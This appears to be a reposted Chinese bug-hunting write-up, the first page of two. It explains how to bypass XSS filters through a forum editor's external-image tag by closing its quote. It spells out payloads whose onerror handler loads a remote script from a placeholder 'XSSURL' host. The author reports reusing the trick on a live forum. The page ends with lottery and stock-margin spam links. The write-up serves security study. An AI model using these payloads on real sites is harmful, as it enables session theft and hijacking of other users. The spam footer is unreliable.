歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

一處圖片引用功能導致的XSS

來源:本站整理 作者:佚名 時間:2020-01-19 TAG: 我要投稿

初步測試
一開始嘗試XSS,發現程序有過濾,提交均顯示Tags are not permitted,最后測出來的是過濾

因為提示速度比較快,猜測前端有一層檢測。嘗試繞過前端檢測,burp攔截正常提交的內容,替換xss payload后發送,發現會自動跳轉回首頁,由此發現程序后端也有內容檢測,這里直接xss暫時行不通。
查看編輯器的其他功能:
圖片上傳:可上傳aspx(其他可能解析后綴均已嘗試),不能解析并跳轉至首頁?缮蟼鱤tml并解析,這種方式構造的xss通常需要主動攻擊,且攻擊時易被管理員察覺到異常,暫不考慮。
表情功能:沒什么可利用的。
柳暗花明又一村
當看到編輯器提示的 img 外部圖片引用方式時引起了我的注意,這里感覺可以操作一下:

正常測試
先來看下正常引用方式時前端的顯示,鏈接被帶入到src中(logo前文字涉及域名,打碼):
[img|XSSURL|xxxxx Logo]

帶入payload
xss payload 放在鏈接的位置再看一下:
常規的payload:img src=x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';>構造的payload:[img|x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';|xxxxx Logo]
提交后審查元素發現為如下顯示:

嘗試閉合
嘗試閉合 x 處的雙引號,讓 onerror 逃逸出來:
[img|x" onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';|hello]

這里提交后發現payload并沒有執行成功,仔細看發現程序輸出時分別在 onerror= 和 ; 后面加了雙引號。
閉合成功
直接給個 > 讓它閉合,雖然成功加載了,但是頁面顯示會有錯誤,這樣十分容易被發現倪端,不夠完美。
[img|x" onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';>|hello]

換個思路通過閉合掉 ; 后面的雙引號,顯示效果如下:
[img|x" onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';"|hello]

最終在沒有任何錯誤內容顯示的情況下成功執行了xss payload:

看到這里可能有人就會想,這種案例觸發的xss是不是很少存在,因為畢竟不是每個編輯器都用這種圖片外鏈引用方式,那么請繼續看下面。
靈活運用
這幾天在搞一個gangdu的論壇,在回復功能處,又遇到了同樣的問題。
本來這個功能應該只能放圖片鏈接的,但是這里插入的鏈接格式和內容并沒有做校驗。

[1] [2]  下一頁

【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 陕西11选5走势图44期 湖北快三玩法奖金 股票配资哪家好 广西11选5走势直播 山东十一夺金开奖查询 上海今时时乐开奖结果 上海十一选五开奖结果一定有 西瓜配资 江苏7位数体彩 股票涨跌是有人操作吗